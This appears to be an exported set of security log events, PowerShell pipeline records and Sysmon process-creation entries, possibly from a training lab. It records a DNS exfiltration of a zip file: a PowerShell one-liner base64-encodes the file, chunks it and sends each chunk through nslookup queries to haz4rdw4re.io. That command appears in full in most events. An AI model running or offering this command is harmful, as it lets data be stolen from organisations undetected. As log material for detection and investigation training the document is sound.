1/11/26 3:28:07.633 PM	<pre>{ [-]   datasource: powershell   event.action: Pipeline Execution Details   file.path: -   host.name: win-3450   message: Pipeline execution details for command line: \$base64 = [System.Convert]::ToBase64String([S ystem.IO.File]::ReadAllBytes("C:\Users\michael.ascot\Downloads\exfiltration\exfilt8me.zip")); \$base64 -split '{1,30})'   Where-Object { \$_ -ne '' }   F orEach-Object {Invoke-Expression "nslookup \$_.haz4r dw4re.io"}. Context Information:      DetailSeque nce=1  DetailTotal=1  SequenceNumber=465  Use rId=SSF\michael.ascot  HostName=ConsoleHost  Hos tVersion=5.1.20348.1366  HostId=cc1a6844-a4f9-4e73-9 8b9-9193fdb89041  HostApplication=C:\Windows \System32\WindowsPowerShell\v1.0\powershell.exe -Ex ecutionPolicy Bypass  EngineVersion=5.1.20348.136 6  RunspaceId=3c649a28-fde1-4e53-936b-e9e725bd 8280  PipelineId=53  ScriptName=  CommandLine =\$base64 = [System.Convert]::ToBase64String([Syste m.IO.File]::ReadAllBytes("C:\Users\michael.ascot\Do wnloads\exfiltration\exfilt8me.zip")); \$base64 -spl it '{1,30})'   Where-Object { \$_ -ne '' }   ForEa ch-Object {Invoke-Expression "nslookup \$_.haz4rdw4r e.io"} Details: CommandInvocation(Invoke-Expressio n): "Invoke-Expression"ParameterBinding(Invoke-Expr ession): name="Command"; value="nslookup IAAgCUAAAA tQAAAAAA.haz4rdw4re.io"   powershell.command.invocation_details.value: "In voke-Expression", "nslookup IAAgCUAAAAAtQAAAAAA.haz4 rdw4re.io"   powershell.command.name: -   powershell.file.script_block_text: -   process.command_line: C:\Windows\System32\Window sPowerShell\v1.0\powershell.exe -ExecutionPolicy By pass   timestamp: 01/11/2026 15:28:07.633   winlog.process.pid: - }</pre> <p>Show as raw text</p> <pre>host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json</pre>

Time	Event
1/11/26 3:28:07.633 PM	<pre>{ [-]   datasource: powershell   event.action: Pipeline Execution Details   file.path: -   host.name: win-3450   message: Pipeline execution details for command line: \$base64 = [System.Convert]::ToBase64String([S ystem.IO.File]::ReadAllBytes("C:\Users\michael.ascot\Downloads\exfiltration\exfilt8me.zip")); \$base64 -split '(.{1,30})'   Where-Object { \$_ -ne '' }   F orEach-Object {Invoke-Expression "nslookup \$_.haz4r dw4re.io"}. Context Information:      DetailSeque nce=1   DetailTotal=1   SequenceNumber=467   Use rId=SSF\michael.ascot   HostName=ConsoleHost   Hos tVersion=5.1.20348.1366   HostId=cc1a6844-a4f9-4e73-9 8b9-9193fdb89041   HostApplication=C:\Windows \System32\WindowsPowerShell\v1.0\powershell.exe -Ex ecutionPolicy Bypass   EngineVersion=5.1.20348.136 6   RunspaceId=3c649a28-fde1-4e53-936b-e9e725bd 8280   PipelineId=53   ScriptName=   CommandLine =\$base64 = [System.Convert]::ToBase64String([Syste m.IO.File]::ReadAllBytes("C:\Users\michael.ascot\Do wnloads\exfiltration\exfilt8me.zip")); \$base64 -spl it '(.{1,30})'   Where-Object { \$_ -ne '' }   ForEa ch-Object {Invoke-Expression "nslookup \$_.haz4rdw4r e.io"} Details: CommandInvocation(Where-Object): "W here-Object"ParameterBinding(Where-Object): name="F ilterScript"; value=" \$_ -ne '' "CommandInvocation (ForEach-Object): "ForEach-Object"ParameterBinding (ForEach-Object): name="Process"; value="Invoke-Exp ression "nslookup \$_.haz4rdw4re.io""ParameterBindin g(Where-Object): name="InputObject"; value=""Paramet erBinding(Where-Object): name="InputObject"; value ="UESDBBQAAAAIANigLlfVU3cDIgAAAI"ParameterBinding(F orEach-Object): name="InputObject"; value="UESDBBQA AAAAIANigLlfVU3cDIgAAAI"ParameterBinding(Where-Objec t): name="InputObject"; value=""ParameterBinding(Wh ere-Object): name="InputObject"; value="8AAAAbAAAAQ 2xpZW50UG9ydGZvbGlv"ParameterBinding(ForEach-Objec t): name="InputObject"; value="8AAAAbAAAAQ2xpZW50UG 9ydGZvbGlv"ParameterBinding(Where-Object): name="In putObject"; value=""ParameterBinding(Where-Object): name="InputObject"; value="U3VtbWFyeS54bHN4c87JTM0r CcgvKk"ParameterBinding(ForEach-Object): name="Inpu tObject"; value="U3VtbWFyeS54bHN4c87JTM0rCcgvKk"Par ameterBinding(Where-Object): name="InputObject"; va lue=""ParameterBinding(Where-Object): name="InputOb ject"; value="nLz8nMDy7NzU0sqtSryCmu40Vyprsk"Paramet erBinding(ForEach-Object): name="InputObject"; val ue="nLz8nMDy7NzU0sqtSryCmu40Vyprsk"ParameterBinding (Where-Object): name="InputObject"; value=""Paramet erBinding(Where-Object): name="InputObject"; value ="AFBLAwQUAAACAC9oC5XHh105R8AAA"ParameterBinding(F orEach-Object): name="InputObject"; value="AFBLAwQU AAACAC9oC5XHh105R8AAA"ParameterBinding(Where-Objec t): name="InputObject"; value=""ParameterBinding(Wh</pre>

Time	Event
	<pre> ere-Object): name="InputObject"; value="AdAAAAHQAAA EludmVzdG9yUHVlc2Vu"ParameterBinding(ForEach-Objec t): name="InputObject"; value="AdAAAAHQAAAEIudmVzdG 9yUHVlc2Vu"ParameterBinding(Where-Object): name="In putObject"; value="ParameterBinding(Where-Object): name="InputObject"; value="dGF0aW9uMjAyMy5wchr488wr Sy0uyS"ParameterBinding(ForEach-Object): name="Inpu tObject"; value="dGF0aW9uMjAyMy5wchr488wrSy0uyS"Par ameterBinding(Where-Object): name="InputObject"; va lue="ParameterBinding(Where-Object): name="InputOb ject"; value="8KKEotTs0rSSzJzM8zMjAy1isoKKkA"Parame terBinding(ForEach-Object): name="InputObject"; val ue="8KKEotTs0rSSzJzM8zMjAy1isoKKkA"ParameterBinding (Where-Object): name="InputObject"; value="Paramet erBinding(Where-Object): name="InputObject"; value ="AFBLAQIUABQAAAAIANigLlfVU3cDIg"ParameterBinding(F orEach-Object): name="InputObject"; value="AFBLAQIU ABQAAAAIANigLlfVU3cDIg"ParameterBinding(Where-Objec t): name="InputObject"; value="ParameterBinding(Wh ere-Object): name="InputObject"; value="AAAI8AAAAbA AAAAAAAAAAAAAAAAAAAA"ParameterBinding(ForEach-Objec t): name="InputObject"; value="AAAI8AAAAbAAAAAAAAAA AAAAAAAAAAAA"ParameterBinding(Where-Object): name="In putObject"; value="ParameterBinding(Where-Object): name="InputObject"; value="AABDbGllbnRQb3J0Zm9saW9T dW1tYX"ParameterBinding(ForEach-Object): name="Inpu tObject"; value="AABDbGllbnRQb3J0Zm9saW9TdW1tYX"Par ameterBinding(Where-Object): name="InputObject"; va lue="ParameterBinding(Where-Object): name="InputOb ject"; value="J5Lnhsc3hQSwECFAAUAAACAC9oC5X"Parame terBinding(ForEach-Object): name="InputObject"; val ue="J5Lnhsc3hQSwECFAAUAAACAC9oC5X"ParameterBinding (Where-Object): name="InputObject"; value="Paramet erBinding(Where-Object): name="InputObject"; value ="Hh105R8AAAAAdAAAAHQAAAAAAAAAAAA"ParameterBinding(F orEach-Object): name="InputObject"; value="Hh105R8A AAAdAAAAHQAAAAAAAAAAAA"ParameterBinding(Where-Objec t): name="InputObject"; value="ParameterBinding(Wh ere-Object): name="InputObject"; value="AAAABbAAAS W52ZXN0b3JQcmVzZW50"ParameterBinding(ForEach-Objec t): name="InputObject"; value="AAAABbAAASW52ZXN0b3 JQcmVzZW50"ParameterBinding(Where-Object): name="In putObject"; value="ParameterBinding(Where-Object): name="InputObject"; value="YXRpb24yMDIzLnBwdHhQSwUG AAAAAA"ParameterBinding(ForEach-Object): name="Inpu tObject"; value="YXRpb24yMDIzLnBwdHhQSwUGAAAAAA"Par ameterBinding(Where-Object): name="InputObject"; va lue="ParameterBinding(Where-Object): name="InputOb ject"; value="IAAgCUAAAtQAAAAA"ParameterBinding(F orEach-Object): name="InputObject"; value="IAAgCUAA AAtQAAAAA"ParameterBinding(Where-Object): name="In putObject"; value=""  powershell.command.invocation_details.value: "Wh ere-Object", " \$_ -ne '' ", "ForEach-Object", "Invo ke-Expression "nslookup \$_.haz4rdw4re.io", "", "UE sDBBQAAAAIANigLlfVU3cDIgAAAI", "UESDBBQAAAAIANigLlf VU3cDIgAAAI", "", "8AAAAbAAAAQ2xpZW50UG9ydgZvbGlv", </pre>

Time	Event
	<pre>"8AAAAbAAAAQ2xpZW50UG9ydGZvbGlv", "", "U3VtbWFyeS54bHN4c87JTM0rCcgvKk", "U3VtbWFyeS54bHN4c87JTM0rCcgvKk", "", "nLz8nMDy7NzU0sqtSryCmu40Vyprsk", "nLz8nMDy7NzU0sqtSryCmu40Vyprsk", "", "AFBLAwQUAAACAC9oC5XHh1O5R8AAA", "AFBLAwQUAAACAC9oC5XHh1O5R8AAA", "", "AdAAAAHQAAAEIudmVzdG9yUHJlc2Vu", "AdAAAAHQAAAEIudmVzdG9yUHJlc2Vu", "", "dGF0aW9uMjAyMy5wchr488wrSy0uyS", "dGF0aW9uMjAyMy5wchr488wrSy0uyS", "", "8KKEotTs0rSSzJzM8zMjAy1isoKKkA", "8KKEotTs0rSSzJzM8zMjAy1isoKKkA", "", "AFBLAQIUABQAAAAIANigLlFvU3cDIg", "AFBLAQIUABQAAAAIANigLlFvU3cDIg", "", "AAAI8AAAAbAAAAAAAAAAAAAAAAAAAAAAAA", "AAAI8AAAAbAAAAAAAAAAAAAAAAAAAAAAAA", "", "AABDbG1lbnRqb3J0Zm9saW9TdW1tYX", "AABDbG1lbnRqb3J0Zm9saW9TdW1tYX", "", "J5Lnhsc3hQSwECFAAUAAACAC9oC5X", "J5Lnhsc3hQSwECFAAUAAACAC9oC5X", "", "Hh1O5R8AAAAAdAAAAHQAAAAAAAAAAAAAAAA", "Hh1O5R8AAAAAdAAAAHQAAAAAAAAAAAAAAAA", "", "AAAABbAAAASW52ZXN0b3JQcmVzZW50", "AAAABbAAAASW52ZXN0b3JQcmVzZW50", "", "YXRpb24yMDIzLnBwdHhQSwUGAAAAA", "YXRpb24yMDIzLnBwdHhQSwUGAAAAA", "", "IAAgCUAAAtQAAAAAAAA", "IAAgCUAAAtQAAAAAAAA", ""</pre> <pre>    powershell.command.name: -     powershell.file.script_block.text: -     process.command_line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy By pass     timestamp: 01/11/2026 15:28:07.633     winlog.process.pid: - }</pre> <p>Show as raw text</p> <pre>host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json</pre>

Time	Event
1/11/26 3:28:07.633 PM	<pre>{ [-]   datasource: powershell   event.action: Pipeline Execution Details   file.path: -   host.name: win-3450   message: Pipeline execution details for command line: \$base64 = [System.Convert]::ToBase64String([S ystem.IO.File]::ReadAllBytes("C:\Users\michael.ascot\Downloads\exfiltration\exfilt8me.zip")); \$base64 -split '{1,30})'   Where-Object { \$_ -ne '' }   F orEach-Object {Invoke-Expression "nslookup \$_.haz4r dw4re.io"}. Context Information:      DetailSeque nce=1  DetailTotal=1  SequenceNumber=459  Use rId=SSF\michael.ascot  HostName=ConsoleHost  Hos tVersion=5.1.20348.1366  HostId=cc1a6844-a4f9-4e73-9 8b9-9193fdb89041  HostApplication=C:\Windows \System32\WindowsPowerShell\v1.0\powershell.exe -Ex ecutionPolicy Bypass  EngineVersion=5.1.20348.136 6  RunspaceId=3c649a28-fde1-4e53-936b-e9e725bd 8280  PipelineId=53  ScriptName=  CommandLine =\$base64 = [System.Convert]::ToBase64String([Syste m.IO.File]::ReadAllBytes("C:\Users\michael.ascot\Do wnloads\exfiltration\exfilt8me.zip")); \$base64 -spl it '{1,30})'   Where-Object { \$_ -ne '' }   ForEa ch-Object {Invoke-Expression "nslookup \$_.haz4rdw4r e.io"} Details: CommandInvocation(Invoke-Expressio n): "Invoke-Expression"ParameterBinding(Invoke-Expr ession): name="Command"; value="nslookup Hh105R8AAA AdAAAAHQAAAAAAAAAAAA.haz4rdw4re.io"   powershell.command.invocation_details.value: "In voke-Expression", "nslookup Hh105R8AAAAAdAAAAHQAAAA AAAA.haz4rdw4re.io"   powershell.command.name: -   powershell.file.script_block_text: -   process.command_line: C:\Windows\System32\Window sPowerShell\v1.0\powershell.exe -ExecutionPolicy By pass   timestamp: 01/11/2026 15:28:07.633   winlog.process.pid: - }</pre> <p>Show as raw text</p> <pre>host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json</pre>

Time	Event
1/11/26 3:28:07.633 PM	<pre>{ [-]   datasource: powershell   event.action: Pipeline Execution Details   file.path: -   host.name: win-3450   message: Pipeline execution details for command line: \$base64 = [System.Convert]::ToBase64String([S ystem.IO.File]::ReadAllBytes("C:\Users\michael.ascot\Downloads\exfiltration\exfilt8me.zip")); \$base64 -split '{1,30})'   Where-Object { \$_ -ne '' }   F orEach-Object {Invoke-Expression "nslookup \$_.haz4r dw4re.io"}. Context Information:      DetailSeque nce=1  DetailTotal=1  SequenceNumber=457  Use rId=SSF\michael.ascot  HostName=ConsoleHost  Hos tVersion=5.1.20348.1366  HostId=cc1a6844-a4f9-4e73-9 8b9-9193fdb89041  HostApplication=C:\Windows \System32\WindowsPowerShell\v1.0\powershell.exe -Ex ecutionPolicy Bypass  EngineVersion=5.1.20348.136 6  RunspaceId=3c649a28-fde1-4e53-936b-e9e725bd 8280  PipelineId=53  ScriptName=  CommandLine =\$base64 = [System.Convert]::ToBase64String([Syste m.IO.File]::ReadAllBytes("C:\Users\michael.ascot\Do wnloads\exfiltration\exfilt8me.zip")); \$base64 -spl it '{1,30})'   Where-Object { \$_ -ne '' }   ForEa ch-Object {Invoke-Expression "nslookup \$_.haz4rdw4r e.io"} Details: CommandInvocation(Invoke-Expressio n): "Invoke-Expression"ParameterBinding(Invoke-Expr ession): name="Command"; value="nslookup J5Lnhsc3hQ SwECFAAUAAAACAC9oC5X.haz4rdw4re.io"   powershell.command.invocation_details.value: "In voke-Expression", "nslookup J5Lnhsc3hQSwECFAAUAAAAC AC9oC5X.haz4rdw4re.io"   powershell.command.name: -   powershell.file.script_block_text: -   process.command_line: C:\Windows\System32\Window sPowerShell\v1.0\powershell.exe -ExecutionPolicy By pass   timestamp: 01/11/2026 15:28:07.633   winlog.process.pid: - }</pre> <p>Show as raw text</p> <pre>host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json</pre>



Time	Event
1/11/26 3:28:07.633 PM	<pre>{ [-]   datasource: powershell   event.action: Pipeline Execution Details   file.path: -   host.name: win-3450   message: Pipeline execution details for command line: \$base64 = [System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes("C:\Users\michael.ascot\Downloads\exfiltration\exfilt8me.zip")); \$base64 -split '(.{1,30})'   Where-Object { \$_ -ne '' }   ForEach-Object {Invoke-Expression "nslookup \$_.haz4rdw4re.io"}. Context Information:      DetailSequence=1  DetailTotal=1  SequenceNumber=463  Use rId=SSF\michael.ascot  HostName=ConsoleHost  HostVersion=5.1.20348.1366  HostId=cc1a6844-a4f9-4e73-98b9-9193fdb89041  HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass  EngineVersion=5.1.20348.1366  RunspaceId=3c649a28-fde1-4e53-936b-e9e725bd8280  PipelineId=53  ScriptName=  CommandLine=\$base64 = [System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes("C:\Users\michael.ascot\Downloads\exfiltration\exfilt8me.zip")); \$base64 -split '(.{1,30})'   Where-Object { \$_ -ne '' }   ForEach-Object {Invoke-Expression "nslookup \$_.haz4rdw4re.io"} Details: CommandInvocation(Invoke-Expression): "Invoke-Expression"ParameterBinding(Invoke-Expression): name="Command"; value="nslookup YXRpb24yMDIzLnBwdHhQSwUGAAAAAA.haz4rdw4re.io"   powershell.command.invocation_details.value: "Invoke-Expression", "nslookup YXRpb24yMDIzLnBwdHhQSwUGAAAAAA.haz4rdw4re.io"   powershell.command.name: -   powershell.file.script_block_text: -   process.command_line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass   timestamp: 01/11/2026 15:28:07.633   winlog.process.pid: - }</pre> <p>Show as raw text</p> <pre>host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json</pre>

Time	Event
1/11/26 3:28:07.633 PM	<pre>{ [-]   datasource: powershell   event.action: Pipeline Execution Details   file.path: -   host.name: win-3450   message: Pipeline execution details for command line: \$base64 = [System.Convert]::ToBase64String([S ystem.IO.File]::ReadAllBytes("C:\Users\michael.ascot\Downloads\exfiltration\exfilt8me.zip")); \$base64 -split '{1,30})'   Where-Object { \$_ -ne '' }   F orEach-Object {Invoke-Expression "nslookup \$_.haz4r dw4re.io"}. Context Information:      DetailSeque nce=1  DetailTotal=1  SequenceNumber=451  Use rId=SSF\michael.ascot  HostName=ConsoleHost  Hos tVersion=5.1.20348.1366  HostId=cc1a6844-a4f9-4e73-9 8b9-9193fdb89041  HostApplication=C:\Windows \System32\WindowsPowerShell\v1.0\powershell.exe -Ex ecutionPolicy Bypass  EngineVersion=5.1.20348.136 6  RunspaceId=3c649a28-fde1-4e53-936b-e9e725bd 8280  PipelineId=53  ScriptName=  CommandLine =\$base64 = [System.Convert]::ToBase64String([Syste m.IO.File]::ReadAllBytes("C:\Users\michael.ascot\Do wnloads\exfiltration\exfilt8me.zip")); \$base64 -spl it '{1,30})'   Where-Object { \$_ -ne '' }   ForEa ch-Object {Invoke-Expression "nslookup \$_.haz4rdw4r e.io"} Details: CommandInvocation(Invoke-Expressio n): "Invoke-Expression"ParameterBinding(Invoke-Expr ession): name="Command"; value="nslookup AFBLAQIUAB QAAAAIANigLlfVU3cDIg.haz4rdw4re.io"   powershell.command.invocation_details.value: "In voke-Expression", "nslookup AFBLAQIUABQAAAAIANigLlf VU3cDIg.haz4rdw4re.io"   powershell.command.name: -   powershell.file.script_block_text: -   process.command_line: C:\Windows\System32\Window sPowerShell\v1.0\powershell.exe -ExecutionPolicy By pass   timestamp: 01/11/2026 15:28:07.633   winlog.process.pid: - }</pre> <p>Show as raw text</p> <pre>host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json</pre>

Time	Event
1/11/26 3:28:07.633 PM	<pre>{ [-]   datasource: powershell   event.action: Pipeline Execution Details   file.path: -   host.name: win-3450   message: Pipeline execution details for command line: \$base64 = [System.Convert]::ToBase64String([S ystem.IO.File]::ReadAllBytes("C:\Users\michael.ascot\Downloads\exfiltration\exfilt8me.zip")); \$base64 -split '{1,30})'   Where-Object { \$_ -ne '' }   F orEach-Object {Invoke-Expression "nslookup \$_.haz4r dw4re.io"}. Context Information:      DetailSeque nce=1  DetailTotal=1  SequenceNumber=449  Use rId=SSF\michael.ascot  HostName=ConsoleHost  Hos tVersion=5.1.20348.1366  HostId=cc1a6844-a4f9-4e73-9 8b9-9193fdb89041  HostApplication=C:\Windows \System32\WindowsPowerShell\v1.0\powershell.exe -Ex ecutionPolicy Bypass  EngineVersion=5.1.20348.136 6  RunspaceId=3c649a28-fde1-4e53-936b-e9e725bd 8280  PipelineId=53  ScriptName=  CommandLine =\$base64 = [System.Convert]::ToBase64String([Syste m.IO.File]::ReadAllBytes("C:\Users\michael.ascot\Do wnloads\exfiltration\exfilt8me.zip")); \$base64 -spl it '{1,30})'   Where-Object { \$_ -ne '' }   ForEa ch-Object {Invoke-Expression "nslookup \$_.haz4rdw4r e.io"} Details: CommandInvocation(Invoke-Expressio n): "Invoke-Expression"ParameterBinding(Invoke-Expr ession): name="Command"; value="nslookup 8KKEotTs0r SSzJzM8zMjAy1isoKKkA.haz4rdw4re.io"   powershell.command.invocation_details.value: "In voke-Expression", "nslookup 8KKEotTs0rSSzJzM8zMjAy1 isoKKkA.haz4rdw4re.io"   powershell.command.name: -   powershell.file.script_block_text: -   process.command_line: C:\Windows\System32\Window sPowerShell\v1.0\powershell.exe -ExecutionPolicy By pass   timestamp: 01/11/2026 15:28:07.633   winlog.process.pid: - }</pre> <p>Show as raw text</p> <pre>host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json</pre>

Time	Event
1/11/26 3:28:06.633 PM	<pre>{ [-]   datasource: sysmon   event.action: Process Create (rule: ProcessCreate)   event.code: 1   host.name: win-3450   process.command_line: "C:\Windows\system32\nslookup.exe" nLz8nMDy7NzU0sqtSryCmu40Vyprsk.haz4rdw4re.io   process.name: nslookup.exe   process.parent.name: powershell.exe   process.parent.pid: 3728   process.pid: 3800   process.working_directory: C:\Users\michael.ascott\downloads\exfiltration\   timestamp: 01/11/2026 15:28:06.633 }</pre> <p>Show as raw text</p> <pre>host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json</pre>
1/11/26 3:28:06.633 PM	<pre>{ [-]   datasource: sysmon   event.action: Process Create (rule: ProcessCreate)   event.code: 1   host.name: win-3450   process.command_line: "C:\Windows\system32\nslookup.exe" AFBLAwQUAAACAC9oC5XHh1O5R8AAA.haz4rdw4re.io   process.name: nslookup.exe   process.parent.name: powershell.exe   process.parent.pid: 3728   process.pid: 6604   process.working_directory: C:\Users\michael.ascott\downloads\exfiltration\   timestamp: 01/11/2026 15:28:06.633 }</pre> <p>Show as raw text</p> <pre>host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json</pre>

Time	Event
1/11/26 3:28:06.633 PM	<pre>{ [-]   datasource: sysmon   event.action: Process Create (rule: ProcessCreate)   event.code: 1   host.name: win-3450   process.command_line: "C:\Windows\system32\nslookup.exe" AdAAAAHQAAAEIudmVzdG9yUHJlc2Vu.haz4rdw4re.io   process.name: nslookup.exe   process.parent.name: powershell.exe   process.parent.pid: 3728   process.pid: 5704   process.working_directory: C:\Users\michael.ascott\downloads\exfiltration\   timestamp: 01/11/2026 15:28:06.633 }</pre> <p>Show as raw text</p> <pre>host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json</pre>
1/11/26 3:28:06.633 PM	<pre>{ [-]   datasource: sysmon   event.action: Process Create (rule: ProcessCreate)   event.code: 1   host.name: win-3450   process.command_line: "C:\Windows\system32\nslookup.exe" U3VtbWFyeS54bHN4c87JTM0rCcgvKk.haz4rdw4re.io   process.name: nslookup.exe   process.parent.name: powershell.exe   process.parent.pid: 3728   process.pid: 5432   process.working_directory: C:\Users\michael.ascott\downloads\exfiltration\   timestamp: 01/11/2026 15:28:06.633 }</pre> <p>Show as raw text</p> <pre>host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json</pre>

Time	Event
1/11/26 3:28:06.633 PM	<pre>{ [-]   datasource: powershell   event.action: Pipeline Execution Details   file.path: -   host.name: win-3450   message: Pipeline execution details for command line: \$base64 = [System.Convert]::ToBase64String([S ystem.IO.File]::ReadAllBytes("C:\Users\michael.ascot\Downloads\exfiltration\exfilt8me.zip")); \$base64 -split '{1,30})'   Where-Object { \$_ -ne '' }   F orEach-Object {Invoke-Expression "nslookup \$_.haz4r dw4re.io"}. Context Information:      DetailSeque nce=1  DetailTotal=1  SequenceNumber=445  Use rId=SSF\michael.ascot  HostName=ConsoleHost  Hos tVersion=5.1.20348.1366  HostId=cc1a6844-a4f9-4e73-9 8b9-9193fdb89041  HostApplication=C:\Windows \System32\WindowsPowerShell\v1.0\powershell.exe -Ex ecutionPolicy Bypass  EngineVersion=5.1.20348.136 6  RunspaceId=3c649a28-fde1-4e53-936b-e9e725bd 8280  PipelineId=53  ScriptName=  CommandLine =\$base64 = [System.Convert]::ToBase64String([Syste m.IO.File]::ReadAllBytes("C:\Users\michael.ascot\Do wnloads\exfiltration\exfilt8me.zip")); \$base64 -spl it '{1,30})'   Where-Object { \$_ -ne '' }   ForEa ch-Object {Invoke-Expression "nslookup \$_.haz4rdw4r e.io"} Details: CommandInvocation(Invoke-Expressio n): "Invoke-Expression"ParameterBinding(Invoke-Expr ession): name="Command"; value="nslookup AdAAAAHQAA AEIudmVzdG9yUHJlc2Vu.haz4rdw4re.io"   powershell.command.invocation_details.value: "In voke-Expression", "nslookup AdAAAAHQAAAEIudmVzdG9yU HJlc2Vu.haz4rdw4re.io"   powershell.command.name: -   powershell.file.script_block_text: -   process.command_line: C:\Windows\System32\Window sPowerShell\v1.0\powershell.exe -ExecutionPolicy By pass   timestamp: 01/11/2026 15:28:06.633   winlog.process.pid: - }</pre> <p>Show as raw text</p> <pre>host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json</pre>

Time	Event
1/11/26 3:28:06.633 PM	<pre>{ [-]   datasource: sysmon   event.action: Process Create (rule: ProcessCreat e)   event.code: 1   host.name: win-3450   process.command_line: "C:\Windows\system32\nsloo kup.exe" 8AAAAbAAAAQ2xpZW50UG9ydGZvbGlv.haz4rdw4re. io   process.name: nslookup.exe   process.parent.name: powershell.exe   process.parent.pid: 3728   process.pid: 3952   process.working_directory: C:\Users\michael.asco t\downloads\exfiltration\   timestamp: 01/11/2026 15:28:06.633 }</pre> <p>Show as raw text</p> <p>host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json</p>

Time	Event
1/11/26 3:28:06.633 PM	<pre>{ [-]   datasource: powershell   event.action: Pipeline Execution Details   file.path: -   host.name: win-3450   message: Pipeline execution details for command line: \$base64 = [System.Convert]::ToBase64String([S ystem.IO.File]::ReadAllBytes("C:\Users\michael.ascot\Downloads\exfiltration\exfilt8me.zip")); \$base64 -split '{1,30})'   Where-Object { \$_ -ne '' }   F orEach-Object {Invoke-Expression "nslookup \$_.haz4r dw4re.io"}. Context Information:      DetailSeque nce=1  DetailTotal=1  SequenceNumber=441  Use rId=SSF\michael.ascot  HostName=ConsoleHost  Hos tVersion=5.1.20348.1366  HostId=cc1a6844-a4f9-4e73-9 8b9-9193fdb89041  HostApplication=C:\Windows \System32\WindowsPowerShell\v1.0\powershell.exe -Ex ecutionPolicy Bypass  EngineVersion=5.1.20348.136 6  RunspaceId=3c649a28-fde1-4e53-936b-e9e725bd 8280  PipelineId=53  ScriptName=  CommandLine =\$base64 = [System.Convert]::ToBase64String([Syste m.IO.File]::ReadAllBytes("C:\Users\michael.ascot\Do wnloads\exfiltration\exfilt8me.zip")); \$base64 -spl it '{1,30})'   Where-Object { \$_ -ne '' }   ForEa ch-Object {Invoke-Expression "nslookup \$_.haz4rdw4r e.io"} Details: CommandInvocation(Invoke-Expressio n): "Invoke-Expression"ParameterBinding(Invoke-Expr ession): name="Command"; value="nslookup nLz8nMDy7N zU0sqtSryCmu4OVyprsk.haz4rdw4re.io"   powershell.command.invocation_details.value: "In voke-Expression", "nslookup nLz8nMDy7NzU0sqtSryCmu4 OVyprsk.haz4rdw4re.io"   powershell.command.name: -   powershell.file.script_block_text: -   process.command_line: C:\Windows\System32\Window sPowerShell\v1.0\powershell.exe -ExecutionPolicy By pass   timestamp: 01/11/2026 15:28:06.633   winlog.process.pid: - }</pre> <p>Show as raw text</p> <pre>host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json</pre>



Time	Event
1/11/26 3:28:06.633 PM	<pre>{ [-]   datasource: powershell   event.action: Pipeline Execution Details   file.path: -   host.name: win-3450   message: Pipeline execution details for command line: \$base64 = [System.Convert]::ToBase64String([S ystem.IO.File]::ReadAllBytes("C:\Users\michael.ascot\Downloads\exfiltration\exfilt8me.zip")); \$base64 -split '{1,30})'   Where-Object { \$_ -ne '' }   F orEach-Object {Invoke-Expression "nslookup \$_.haz4r dw4re.io"}. Context Information:      DetailSeque nce=1  DetailTotal=1  SequenceNumber=435  Use rId=SSF\michael.ascot  HostName=ConsoleHost  Hos tVersion=5.1.20348.1366  HostId=cc1a6844-a4f9-4e73-9 8b9-9193fdb89041  HostApplication=C:\Windows \System32\WindowsPowerShell\v1.0\powershell.exe -Ex ecutionPolicy Bypass  EngineVersion=5.1.20348.136 6  RunspaceId=3c649a28-fde1-4e53-936b-e9e725bd 8280  PipelineId=53  ScriptName=  CommandLine =\$base64 = [System.Convert]::ToBase64String([Syste m.IO.File]::ReadAllBytes("C:\Users\michael.ascot\Do wnloads\exfiltration\exfilt8me.zip")); \$base64 -spl it '{1,30})'   Where-Object { \$_ -ne '' }   ForEa ch-Object {Invoke-Expression "nslookup \$_.haz4rdw4r e.io"} Details: CommandInvocation(Invoke-Expressio n): "Invoke-Expression"ParameterBinding(Invoke-Expr ession): name="Command"; value="nslookup UEsDBBQAAA AIANigLlfVU3cDIgAAAI.haz4rdw4re.io"   powershell.command.invocation_details.value: "In voke-Expression", "nslookup UEsDBBQAAAAIANigLlfVU3c DIgAAAI.haz4rdw4re.io"   powershell.command.name: -   powershell.file.script_block_text: -   process.command_line: C:\Windows\System32\Window sPowerShell\v1.0\powershell.exe -ExecutionPolicy By pass   timestamp: 01/11/2026 15:28:06.633   winlog.process.pid: - }</pre> <p>Show as raw text</p> <pre>host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json</pre>

Time	Event
1/11/26 3:28:06.633 PM	<pre>{ [-]   datasource: sysmon   event.action: Process Create (rule: ProcessCreat e)   event.code: 1   host.name: win-3450   process.command_line: "C:\Windows\system32\nsloo kup.exe" 8KKEotTs0rSSzJzM8zMjAy1isoKKkA.haz4rdw4re. io   process.name: nslookup.exe   process.parent.name: powershell.exe   process.parent.pid: 3728   process.pid: 4752   process.working_directory: C:\Users\michael.asco t\downloads\exfiltration\   timestamp: 01/11/2026 15:28:06.633 }</pre> <p>Show as raw text</p> <pre>host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json</pre>

Time	Event
